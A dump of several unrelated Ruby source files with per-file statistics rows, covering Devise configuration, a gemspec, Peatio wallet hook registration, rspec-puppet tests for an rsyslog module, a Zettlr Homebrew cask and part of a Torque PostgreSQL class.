# "users/sessions/new". It's turned off by default because it's slower if you
# are using only default views.
# config.scoped_views = false
# Configure the default scope given to Warden. By default it's the first
# devise role declared in your routes (usually :user).
# config.default_scope = :user
# Set this configuration to false if you want /users/sign_out to sign out
# only the current scope. By default, Devise signs out all scopes.
# config.sign_out_all_scopes = true
# ==> Navigation configuration
# Lists the formats that should be treated as navigational. Formats like
# :html, should redirect to the sign in page when the user does not have
# access, but formats like :xml or :json, should return 401.
#
# If you have any extra navigational formats, like :iphone or :mobile, you
# should add them to the navigational formats lists.
#
# The "*/*" below is required to match Internet Explorer requests.
# config.navigational_formats = ['*/*', :html]
# The default HTTP method used to sign out a resource. Default is :delete.
config.sign_out_via = :delete
# ==> OmniAuth
# Add a new OmniAuth provider. Check the wiki for more information on setting
# up on your models and hooks.
# config.omniauth :github, 'APP_ID', 'APP_SECRET', scope: 'user,public_repo'
# ==> Warden configuration
# If you want to use other strategies, that are not supported by Devise, or
# change the failure app, you can configure them inside the config.warden block.
#
# config.warden do |manager|
# manager.intercept_401 = false
# manager.default_strategies(scope: :user).unshift :some_external_strategy
# end
# ==> Mountable engine configurations
# When using Devise inside an engine, let's call it `MyEngine`, and this engine
# is mountable, there are some extra configurations to be taken into account.
# The following options are available, assuming the engine is mounted as:
#
# mount MyEngine, at: '/my_engine'
#
# The router that invoked `devise_for`, in the example above, would be:
# config.router_name = :my_engine
#
# When using OmniAuth, Devise cannot automatically set OmniAuth path,
# so you need to do it manually. For the users scope, it would be:
# config.omniauth_path_prefix = '/my_engine/users/auth'
# ==> Turbolinks configuration
# If your app is using Turbolinks, Turbolinks::Controller needs to be included to make redirection work correctly:
#
# ActiveSupport.on_load(:devise_failure_app) do
# include Turbolinks::Controller
# end
# ==> Configuration for :registerable
# When set to false, does not sign a user in automatically after their password is
# changed. Defaults to true, so a user is signed in automatically after changing a password.
# config.sign_in_after_change_password = true
end
| 48.19 | 154 | 0.751262 |
b92395c6bc35fee44ee2864ef5ec0ca0373c6060 | 861 | # frozen_string_literal: true
$LOAD_PATH.push File.expand_path('lib', __dir__)
# Maintain your gem's version:
require 'active_storage_validations/version'
# Describe your gem and declare its dependencies:
Gem::Specification.new do |s|
s.name = 'active_storage_validations'
s.version = ActiveStorageValidations::VERSION
s.authors = ['Igor Kasyanchuk']
s.email = ['[email protected]']
s.homepage = 'https://github.com/igorkasyanchuk'
s.summary = 'Validations for Active Storage'
s.description = 'Validations for Active Storage (presence)'
s.license = 'MIT'
s.files = Dir['{app,config,db,lib}/**/*', 'MIT-LICENSE', 'Rakefile', 'README.md']
s.add_dependency 'rails', '>= 5.2.0'
s.add_development_dependency 'pry'
s.add_development_dependency 'rubocop'
s.add_development_dependency 'sqlite3'
end
| 33.115385 | 83 | 0.70964 |
e2f25c02d256bc06255bf0be2b13a7c55635f4ba | 1,585 | module Peatio
module Paycentralservice
module Hooks
BLOCKCHAIN_VERSION_REQUIREMENT = "~> 1.0.0"
WALLET_VERSION_REQUIREMENT = "~> 1.0.0"
class << self
def check_compatibility
unless Gem::Requirement.new(BLOCKCHAIN_VERSION_REQUIREMENT)
.satisfied_by?(Gem::Version.new(Peatio::Blockchain::VERSION))
[
"Paycentralservice blockchain version requiremnt was not suttisfied by Peatio::Blockchain.",
"Paycentralservice blockchain requires #{BLOCKCHAIN_VERSION_REQUIREMENT}.",
"Peatio::Blockchain version is #{Peatio::Blockchain::VERSION}"
          ].join("\n").tap { |s| Kernel.abort s }
end
unless Gem::Requirement.new(WALLET_VERSION_REQUIREMENT)
.satisfied_by?(Gem::Version.new(Peatio::Wallet::VERSION))
[
"Paycentralservice wallet version requiremnt was not suttisfied by Peatio::Wallet.",
"Paycentralservice wallet requires #{WALLET_VERSION_REQUIREMENT}.",
"Peatio::Wallet version is #{Peatio::Wallet::VERSION}"
          ].join("\n").tap { |s| Kernel.abort s }
end
end
def register
Peatio::Blockchain.registry[:pcs] = Paycentralservice::Blockchain
Peatio::Wallet.registry[:pcsd] = Paycentralservice::Wallet
end
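        # Once registered, the adapters are resolvable by key, e.g.
        # (a sketch; the exact lookup depends on Peatio's registry API):
        #
        #   Peatio::Blockchain.registry[:pcs]   # => Paycentralservice::Blockchain
        #   Peatio::Wallet.registry[:pcsd]      # => Paycentralservice::Wallet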
end
if defined?(Rails::Railtie)
require "peatio/paycentralservice/railtie"
else
check_compatibility
register
end
end
end
end
| 36.860465 | 106 | 0.606309 |
087883320805aca5867ae0ad51ae7d0c9a12a62a | 30,086 | require 'spec_helper'
describe 'rsyslog' do
describe 'rsyslog_config' do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
:domain => 'defaultdomain',
}
end
context 'attributes' do
context 'with default params' do
it {
should contain_file('rsyslog_config').with({
'path' => '/etc/rsyslog.conf',
'owner' => 'root',
'group' => 'root',
'mode' => '0644',
'require' => 'Package[rsyslog]',
'notify' => 'Service[rsyslog_daemon]',
})
}
end
end
context 'rsyslog config content' do
context 'with default params' do
it { should contain_file('rsyslog_config').with_content(/^kern.\*\s+\/var\/log\/messages$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ModLoad imudp.so$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ModLoad imtcp.so$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$template RemoteHost, "\/srv\/logs\/%HOSTNAME%\/%\$YEAR%-%\$MONTH%-%\$DAY%.log"$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$WorkDirectory \/var\/spool\/rsyslog # where to place spool files$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ActionQueueFileName queue # unique name prefix for spool files$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ActionQueueMaxDiskSpace 1g # 1gb space limit \(use as much as possible\)$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ActionQueueSaveOnShutdown on # save messages to disk on shutdown$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ActionQueueType LinkedList # run asynchronously$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ActionResumeRetryCount -1 # infinite retries if host is down$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\*.\* @@log.defaultdomain:514/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$RuleSet remote\n\*.\*?RemoteHost$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$InputTCPServerBindRuleset remote$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$InputTCPServerRun 514$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$InputUDPServerBindRuleset remote$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$UDPServerRun 514$/) }
end
context 'with is_log_server=true' do
let :params do
{ :is_log_server => 'true' }
end
it { should contain_file('rsyslog_config').with_content(/^kern.\*\s+\/var\/log\/messages$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ModLoad imtcp.so$/) }
it { should contain_file('rsyslog_config').with_content(/^\$template RemoteHost, "\/srv\/logs\/%HOSTNAME%\/%\$YEAR%-%\$MONTH%-%\$DAY%.log"$/) }
it { should contain_file('rsyslog_config').with_content(/^\$RuleSet remote$/) }
it { should contain_file('rsyslog_config').with_content(/^\*.\* \?RemoteHost$/) }
it { should contain_file('rsyslog_config').with_content(/^\$InputTCPServerBindRuleset remote$/) }
it { should contain_file('rsyslog_config').with_content(/^\$InputTCPServerRun 514$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ModLoad imudp.so$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\*.\* @@log.defaultdomain:514/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$InputUDPServerBindRuleset remote$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$UDPServerRun 514$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$WorkDirectory \/var\/spool\/rsyslog # where to place spool files$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ActionQueueFileName queue # unique name prefix for spool files$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ActionQueueMaxDiskSpace 1g # 1gb space limit \(use as much as possible\)$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ActionQueueSaveOnShutdown on # save messages to disk on shutdown$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ActionQueueType LinkedList # run asynchronously$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ActionResumeRetryCount -1 # infinite retries if host is down$/) }
end
context 'with is_log_server enabled and transport_protocol=tcp specified' do
let :params do
{
:is_log_server => 'true',
:transport_protocol => 'tcp',
}
end
it { should contain_file('rsyslog_config').with_content(/^kern.\*\s+\/var\/log\/messages$/) }
it { should contain_file('rsyslog_config').with_content(/^\$template RemoteHost, "\/srv\/logs\/%HOSTNAME%\/%\$YEAR%-%\$MONTH%-%\$DAY%.log"$/) }
it { should contain_file('rsyslog_config').with_content(/^\$RuleSet remote$/) }
it { should contain_file('rsyslog_config').with_content(/^\*.\* \?RemoteHost$/) }
it { should contain_file('rsyslog_config').with_content(/^\$InputTCPServerBindRuleset remote$/) }
it { should contain_file('rsyslog_config').with_content(/^\$InputTCPServerRun 514$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ModLoad imtcp.so$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ModLoad imudp.so$/) }
end
context 'with is_log_server enabled and transport_protocol=udp specified' do
let :params do
{
:is_log_server => 'true',
:transport_protocol => 'udp',
}
end
it { should contain_file('rsyslog_config').with_content(/^kern.\*\s+\/var\/log\/messages$/) }
it { should contain_file('rsyslog_config').with_content(/^\$template RemoteHost, "\/srv\/logs\/%HOSTNAME%\/%\$YEAR%-%\$MONTH%-%\$DAY%.log"$/) }
it { should contain_file('rsyslog_config').with_content(/^\$RuleSet remote$/) }
it { should contain_file('rsyslog_config').with_content(/^\*.\* \?RemoteHost$/) }
it { should contain_file('rsyslog_config').with_content(/^\$InputUDPServerBindRuleset remote$/) }
it { should contain_file('rsyslog_config').with_content(/^\$UDPServerRun 514$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ModLoad imtcp.so$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ModLoad imudp.so$/) }
end
context 'with is_log_server enabled and enable_tcp_server enabled and enable_udp_server enabled' do
let :params do
{
:is_log_server => 'true',
:enable_tcp_server => 'true',
:enable_udp_server => 'true',
}
end
it { should contain_file('rsyslog_config').with_content(/^kern.\*\s+\/var\/log\/messages$/) }
it { should contain_file('rsyslog_config').with_content(/^\$template RemoteHost, "\/srv\/logs\/%HOSTNAME%\/%\$YEAR%-%\$MONTH%-%\$DAY%.log"$/) }
it { should contain_file('rsyslog_config').with_content(/^\$RuleSet remote$/) }
it { should contain_file('rsyslog_config').with_content(/^\*.\* \?RemoteHost$/) }
it { should contain_file('rsyslog_config').with_content(/^\$InputTCPServerBindRuleset remote$/) }
it { should contain_file('rsyslog_config').with_content(/^\$InputTCPServerRun 514$/) }
it { should contain_file('rsyslog_config').with_content(/^\$InputUDPServerBindRuleset remote$/) }
it { should contain_file('rsyslog_config').with_content(/^\$UDPServerRun 514$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ModLoad imtcp.so$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ModLoad imudp.so$/) }
end
context 'with remote_logging enabled' do
let :params do
{ :remote_logging => 'true' }
end
it { should contain_file('rsyslog_config').with_content(/^kern.\*\s+\/var\/log\/messages$/) }
it { should contain_file('rsyslog_config').with_content(/^\$WorkDirectory \/var\/spool\/rsyslog # where to place spool files$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueFileName queue # unique name prefix for spool files$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueMaxDiskSpace 1g # 1gb space limit \(use as much as possible\)$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueSaveOnShutdown on # save messages to disk on shutdown$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueType LinkedList # run asynchronously$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionResumeRetryCount -1 # infinite retries if host is down$/) }
it { should contain_file('rsyslog_config').with_content(/^\*.\* @@log.defaultdomain:514/) }
end
context 'with remote_logging enabled and source_facilities specified' do
let :params do
{
:remote_logging => 'true',
:source_facilities => '*.*;user.none',
}
end
it { should contain_file('rsyslog_config').with_content(/^kern.\*\s+\/var\/log\/messages$/) }
it { should contain_file('rsyslog_config').with_content(/^\$WorkDirectory \/var\/spool\/rsyslog # where to place spool files$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueFileName queue # unique name prefix for spool files$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueMaxDiskSpace 1g # 1gb space limit \(use as much as possible\)$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueSaveOnShutdown on # save messages to disk on shutdown$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueType LinkedList # run asynchronously$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionResumeRetryCount -1 # infinite retries if host is down$/) }
it { should contain_file('rsyslog_config').with_content(/^\*.\*;user.none @@log.defaultdomain:514/) }
end
context 'with remote_logging enabled and transport_protocol=tcp specified' do
let :params do
{
:remote_logging => 'true',
:transport_protocol => 'tcp',
}
end
it { should contain_file('rsyslog_config').with_content(/^kern.\*\s+\/var\/log\/messages$/) }
it { should contain_file('rsyslog_config').with_content(/^\$WorkDirectory \/var\/spool\/rsyslog # where to place spool files$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueFileName queue # unique name prefix for spool files$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueMaxDiskSpace 1g # 1gb space limit \(use as much as possible\)$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueSaveOnShutdown on # save messages to disk on shutdown$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueType LinkedList # run asynchronously$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionResumeRetryCount -1 # infinite retries if host is down$/) }
it { should contain_file('rsyslog_config').with_content(/^\*.\* @@log.defaultdomain:514$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ModLoad imtcp.so$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ModLoad imudp.so$/) }
end
context 'with remote_logging enabled and transport_protocol=udp specified' do
let :params do
{
:remote_logging => 'true',
:transport_protocol => 'udp',
}
end
it { should contain_file('rsyslog_config').with_content(/^kern.\*\s+\/var\/log\/messages$/) }
it { should contain_file('rsyslog_config').with_content(/^\$WorkDirectory \/var\/spool\/rsyslog # where to place spool files$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueFileName queue # unique name prefix for spool files$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueMaxDiskSpace 1g # 1gb space limit \(use as much as possible\)$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueSaveOnShutdown on # save messages to disk on shutdown$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionQueueType LinkedList # run asynchronously$/) }
it { should contain_file('rsyslog_config').with_content(/^\$ActionResumeRetryCount -1 # infinite retries if host is down$/) }
it { should contain_file('rsyslog_config').with_content(/^\*.\* @log.defaultdomain:514$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ModLoad imudp.so$/) }
it { should_not contain_file('rsyslog_config').with_content(/^\$ModLoad imtcp.so$/) }
end
context 'with source_facilities set to an empty string' do
let :params do
{ :source_facilities => '' }
end
it do
expect {
should contain_class('rsyslog')
}.to raise_error(Puppet::Error,/rsyslog::source_facilities cannot be empty!/)
end
end
context 'with log_dir and remote_template set' do
let :params do
{
:is_log_server => 'true',
:log_dir => '/foo/bar',
:remote_template => '%HOSTNAME%.log',
}
end
it {
should contain_file('rsyslog_config') \
.with_content(/^\$template RemoteHost, "\/foo\/bar\/%HOSTNAME%.log"$/)
}
end
end
end
describe 'rsyslog_package' do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
context 'with default params' do
it {
should contain_package('rsyslog').with({
'ensure' => 'present'
})
}
end
context 'specified as an array' do
let(:params) { { :package => ['rsyslog', 'andfriends'] } }
it {
should contain_package('rsyslog').with({
'ensure' => 'present'
})
}
it {
should contain_package('andfriends').with({
'ensure' => 'present'
})
}
end
context 'with package_ensure=absent' do
let (:params) { { :package_ensure => 'absent' } }
it {
should contain_package('rsyslog').with({
'ensure' => 'absent',
})
}
end
end
describe 'rsyslog_daemon' do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
context 'with default params' do
it { should contain_service('rsyslog_daemon').with( { 'name' => 'rsyslog' } ) }
end
context 'with daemon_ensure=stopped' do
let (:params) { { :daemon_ensure => 'stopped' } }
it {
should contain_service('rsyslog_daemon').with({
'name' => 'rsyslog',
'ensure' => 'stopped',
})
}
end
end
logrotate_hash = {
'el5' => { :osfamily => 'RedHat', :release => '5', :pid => '/var/run/rsyslogd.pid' },
'el6' => { :osfamily => 'RedHat', :release => '6', :pid => '/var/run/syslogd.pid' },
'debian7' => { :osfamily => 'Debian', :release => '7', :pid => '/var/run/rsyslogd.pid' },
'suse11' => { :osfamily => 'Suse', :release => '11', :pid => '/var/run/rsyslogd.pid' },
}
describe 'rsyslog_logrotate_d_config' do
logrotate_hash.sort.each do |k,v|
context "with default params on #{v[:osfamily]} #{v[:release]}" do
let :facts do
{
:osfamily => v[:osfamily],
:lsbmajdistrelease => v[:release],
}
end
it {
should contain_file('rsyslog_logrotate_d_config').with({
'path' => '/etc/logrotate.d/syslog',
'owner' => 'root',
'group' => 'root',
'mode' => '0644',
'require' => 'Package[rsyslog]',
})
}
it { should contain_file('rsyslog_logrotate_d_config').with_content(
%{# This file is being maintained by Puppet.
# DO NOT EDIT
/var/log/messages
/var/log/secure
/var/log/maillog
/var/log/spooler
/var/log/boot.log
/var/log/cron
{
sharedscripts
postrotate
/bin/kill -HUP `cat #{v[:pid]} 2> /dev/null` 2> /dev/null || true
endscript
}
})
}
end
end
end
describe 'with pid_file parameter' do
context 'specified' do
let(:params) { { :pid_file => '/path/to/syslog.pid' } }
let :facts do
{
:osfamily => 'Debian',
:lsbmajdistrelease => '7',
}
end
it {
should contain_file('rsyslog_logrotate_d_config').with({
'path' => '/etc/logrotate.d/syslog',
'owner' => 'root',
'group' => 'root',
'mode' => '0644',
'require' => 'Package[rsyslog]',
})
}
it { should contain_file('rsyslog_logrotate_d_config').with_content(
%{# This file is being maintained by Puppet.
# DO NOT EDIT
/var/log/messages
/var/log/secure
/var/log/maillog
/var/log/spooler
/var/log/boot.log
/var/log/cron
{
sharedscripts
postrotate
/bin/kill -HUP `cat /path/to/syslog.pid 2> /dev/null` 2> /dev/null || true
endscript
}
})
}
end
context 'with pid_file specified as an invalid value' do
let(:params) { { :pid_file => 'invalid/path/to/syslog.pid' } }
let :facts do
{
:osfamily => 'Debian',
:lsbmajdistrelease => '7',
}
end
it do
expect {
should contain_class('rsyslog')
}.to raise_error(Puppet::Error)
end
end
end
describe 'rsyslog_sysconfig' do
context 'on Debian' do
let :facts do
{ :osfamily => 'Debian' }
end
context 'with default params' do
it {
should contain_file('rsyslog_sysconfig').with({
'path' => '/etc/default/rsyslog',
'owner' => 'root',
'group' => 'root',
'mode' => '0644',
'require' => 'Package[rsyslog]',
'notify' => 'Service[rsyslog_daemon]',
})
}
it { should contain_file('rsyslog_sysconfig').with_content(/^RSYSLOGD_OPTIONS="-c5"$/) }
end
end
context 'on EL 6' do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
context 'with default params' do
it {
should contain_file('rsyslog_sysconfig').with({
'path' => '/etc/sysconfig/rsyslog',
'owner' => 'root',
'group' => 'root',
'mode' => '0644',
'require' => 'Package[rsyslog]',
'notify' => 'Service[rsyslog_daemon]',
})
}
it {
should contain_file('rsyslog_sysconfig').with_content(/^SYSLOGD_OPTIONS="-c 4"$/)
}
end
end
context 'on EL 5' do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '5',
}
end
context 'with default params' do
it {
should contain_file('rsyslog_sysconfig').with({
'path' => '/etc/sysconfig/rsyslog',
'owner' => 'root',
'group' => 'root',
'mode' => '0644',
'require' => 'Package[rsyslog]',
'notify' => 'Service[rsyslog_daemon]',
})
}
it { should contain_file('rsyslog_sysconfig').with_content(/^SYSLOGD_OPTIONS="-m 0"$/) }
it { should contain_file('rsyslog_sysconfig').with_content(/^KLOGD_OPTIONS="-x"$/) }
end
end
context 'on Suse 11' do
let :facts do
{
:osfamily => 'Suse',
:lsbmajdistrelease => '11',
}
end
context 'with default params' do
it {
should contain_file('rsyslog_sysconfig').with({
'path' => '/etc/sysconfig/syslog',
'owner' => 'root',
'group' => 'root',
'mode' => '0644',
'require' => 'Package[rsyslog]',
'notify' => 'Service[rsyslog_daemon]',
})
}
it { should contain_file('rsyslog_sysconfig').with_content(/^KERNEL_LOGLEVEL=1$/) }
it { should contain_file('rsyslog_sysconfig').with_content(/^SYSLOGD_PARAMS=""$/) }
it { should contain_file('rsyslog_sysconfig').with_content(/^KLOGD_PARAMS="-x"$/) }
it { should contain_file('rsyslog_sysconfig').with_content(/^SYSLOG_DAEMON="rsyslogd"$/) }
it { should contain_file('rsyslog_sysconfig').with_content(/^SYSLOG_NG_PARAMS=""$/) }
it { should contain_file('rsyslog_sysconfig').with_content(/^RSYSLOGD_NATIVE_VERSION="5"$/) }
it { should contain_file('rsyslog_sysconfig').with_content(/^RSYSLOGD_COMPAT_VERSION=""$/) }
it { should contain_file('rsyslog_sysconfig').with_content(/^RSYSLOGD_PARAMS=""$/) }
end
end
end
describe 'rsyslog_d_dir' do
context "with default params" do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
it {
should contain_file('rsyslog_d_dir').with({
'ensure' => 'directory',
'path' => '/etc/rsyslog.d',
'owner' => 'root',
'group' => 'root',
'mode' => '0755',
'purge' => true,
'recurse' => true,
'require' => 'Common::Mkdir_p[/etc/rsyslog.d]',
})
}
end
context "with rsyslog_d_dir parameters specified" do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
let :params do
{ :rsyslog_d_dir => '/custom/rsyslog.d',
:rsyslog_d_dir_owner => 'other',
:rsyslog_d_dir_group => 'othergroup',
:rsyslog_d_dir_mode => '0775',
:rsyslog_d_dir_purge => false,
}
end
it {
should contain_file('rsyslog_d_dir').with({
'ensure' => 'directory',
'path' => '/custom/rsyslog.d',
'owner' => 'other',
'group' => 'othergroup',
'mode' => '0775',
'recurse' => true,
'purge' => false,
'require' => 'Common::Mkdir_p[/custom/rsyslog.d]',
})
}
end
context "with rsyslog_d_dir specified as invalid path" do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
let (:params) { { :rsyslog_d_dir => 'custom/rsyslog.d' } }
it 'should fail' do
expect {
should contain_class('rsyslog')
}.to raise_error(Puppet::Error)
end
end
['true',true].each do |value|
context "with rsyslog_d_dir_purge specified as #{value}" do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
let (:params) { { :rsyslog_d_dir_purge => value } }
it {
should contain_file('rsyslog_d_dir').with({
'recurse' => true,
'purge' => true,
})
}
end
end
['false',false].each do |value|
context "with rsyslog_d_dir_purge specified as #{value}" do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
let (:params) { { :rsyslog_d_dir_purge => value } }
it {
should contain_file('rsyslog_d_dir').with({
'recurse' => true,
'purge' => false,
})
}
end
end
context 'with rsyslog_d_dir_purge specified as an invalid value' do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
let (:params) { { :rsyslog_d_dir_purge => 'invalid' } }
it 'should fail' do
expect {
should contain_class('rsyslog')
}.to raise_error(Puppet::Error)
end
end
end
describe 'case is_log_server, default params' do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
context 'case true' do
let(:params) { { :is_log_server => 'true' } }
it { should contain_class('common') }
it {
should contain_file('log_dir').with({
'ensure' => 'directory',
'path' => '/srv/logs',
'owner' => 'root',
'group' => 'root',
'mode' => '0750',
'require' => 'Common::Mkdir_p[/srv/logs]'
})
}
end
context 'case true, log_dir set' do
let :params do
{
:is_log_server => 'true',
:log_dir => '/foo/bar',
:log_dir_owner => 'nobody',
:log_dir_group => 'staff',
:log_dir_mode => '0755',
}
end
it {
should contain_file('log_dir').with({
'ensure' => 'directory',
'path' => '/foo/bar',
'owner' => 'nobody',
'group' => 'staff',
'mode' => '0755',
'require' => 'Common::Mkdir_p[/foo/bar]',
})
}
end
context 'case default' do
let(:params) { { :is_log_server => 'undefined' } }
it do
expect {
should contain_class('rsyslog')
}.to raise_error(Puppet::Error,/rsyslog::is_log_server is undefined and must be \'true\' or \'false\'./)
end
end
end
describe 'case transport_protocol, default params' do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
context 'with transport_protocol set to invalid value' do
let(:params) { { :transport_protocol => 'invalid' } }
it do
expect {
should contain_class('rsyslog')
}.to raise_error(Puppet::Error,/rsyslog::transport_protocol is invalid and must be \'tcp\' or \'udp\'./)
end
end
end
describe 'case remote_logging, default params' do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
context 'case true' do
let(:params) { { :remote_logging => 'true' } }
it {
should contain_file('ryslog_spool_directory').with({
'ensure' => 'directory',
'path' => '/var/spool/rsyslog',
'owner' => 'root',
'group' => 'root',
'mode' => '0700',
'require' => 'Common::Mkdir_p[/var/spool/rsyslog]'
})
}
it {
should contain_exec('mkdir_p-/var/spool/rsyslog').with({
'command' => 'mkdir -p /var/spool/rsyslog',
'unless' => 'test -d /var/spool/rsyslog',
})
}
end
context 'case false' do
let(:params) { { :remote_logging => 'false' } }
it {
should_not contain_file('ryslog_spool_directory')
}
it {
should_not contain_exec('mkdir_p-/var/spool/rsyslog')
}
end
end
describe 'module platform support' do
context 'on supported osfamily, RedHat' do
context 'on unsupported major release 4' do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '4',
}
end
it do
expect {
should contain_class('rsyslog')
}.to raise_error(Puppet::Error,/rsyslog supports RedHat like systems with major release of 5 and 6 and you have 4/)
end
end
context 'on supported major release 5' do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '5',
}
end
it { should contain_class('rsyslog') }
end
context 'on supported major release 6' do
let :facts do
{
:osfamily => 'RedHat',
:lsbmajdistrelease => '6',
}
end
it { should contain_class('rsyslog') }
end
end
context 'on supported osfamily, Debian' do
let :facts do
{ :osfamily => 'Debian' }
end
it { should contain_class('rsyslog') }
end
context 'on supported osfamily, Suse' do
context 'on unsupported major release 10' do
let :facts do
{
:osfamily => 'Suse',
:lsbmajdistrelease => '10',
}
end
it do
expect {
should contain_class('rsyslog')
}.to raise_error(Puppet::Error,/rsyslog supports Suse like systems with major release 11, and you have 10/)
end
end
context 'on supported major release 11' do
let :facts do
{
:osfamily => 'Suse',
:lsbmajdistrelease => '11',
}
end
it { should contain_class('rsyslog') }
end
end
context 'on unsupported osfamily, Solaris' do
let(:facts) { { :osfamily => 'Solaris' } }
it do
expect {
should contain_class('rsyslog')
}.to raise_error(Puppet::Error,/rsyslog supports osfamilies RedHat, Suse and Debian. Detected osfamily is Solaris/)
end
end
end
end
| 37.281289 | 155 | 0.571262 |
f7e52d29d0b35007255508fd8dc819d378773b92 | 716 | cask "zettlr" do
arch = Hardware::CPU.intel? ? "x64" : "arm64"
version "2.1.2"
if Hardware::CPU.intel?
sha256 "c16ef93a6de8b1857704346954beb8cdfb9629e8f773dcd5588d3a67b8f32a8c"
else
sha256 "098330ea9c1848acd202c299e3b1c4f8a309745c33d34c5c1bced24f5be7f48e"
end
url "https://github.com/Zettlr/Zettlr/releases/download/v#{version}/Zettlr-#{version}-#{arch}.dmg"
name "Zettlr"
desc "Open-source markdown editor"
homepage "https://github.com/Zettlr/Zettlr/"
app "Zettlr.app"
zap trash: [
"~/Library/Application Support/zettlr",
"~/Library/Logs/Zettlr",
"~/Library/Preferences/com.zettlr.app.plist",
"~/Library/Saved Application State/com.zettlr.app.savedState",
]
end
| 27.538462 | 100 | 0.72067 |
ed10cbbd2f282500a08292934a846466bf3f4dce | 2,211 | # frozen_string_literal: true
module Torque
module PostgreSQL
class AuxiliaryStatement
class Settings < Collector.new(:attributes, :join, :join_type, :query, :requires,
:polymorphic, :through)
attr_reader :base, :source
alias_method :select, :attributes
alias_method :cte, :source
delegate :relation_query?, to: Torque::PostgreSQL::AuxiliaryStatement
delegate :table, :table_name, to: :@source
delegate :sql, to: ::Arel
def initialize(base, source)
@base = base
@source = source
end
def base_name
@base.name
end
def base_table
@base.arel_table
end
# Get the arel version of the table set on the query
def query_table
raise StandardError, 'The query is not defined yet' if query.nil?
return query.arel_table if relation_query?(query)
@query_table
end
# Grant an easy access to arel table columns
def col(name)
query_table[name.to_s]
end
alias column col
# There are two ways of setting the query:
# - A simple relation based on a Model
# - A Arel-based select manager
# - A string or a proc that requires the table name as first argument
def query(value = nil, command = nil)
return @query if value.nil?
return @query = value if relation_query?(value)
if value.is_a?(::Arel::SelectManager)
@query = value
            @query_table = value.source.left
return
end
valid_type = command.respond_to?(:call) || command.is_a?(String)
raise ArgumentError, <<-MSG.squish if command.nil?
To use proc or string as query, you need to provide the table name
as the first argument
MSG
raise ArgumentError, <<-MSG.squish unless valid_type
Only relation, string and proc are valid object types for query,
#{command.inspect} given.
MSG
@query = command
@query_table = ::Arel::Table.new(value)
end
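        # A minimal sketch of the accepted forms (model and table names are
        # illustrative):
        #
        #   settings.query(Comment.approved)                     # relation
        #   settings.query(Arel::Table.new(:comments).project(Arel.star))
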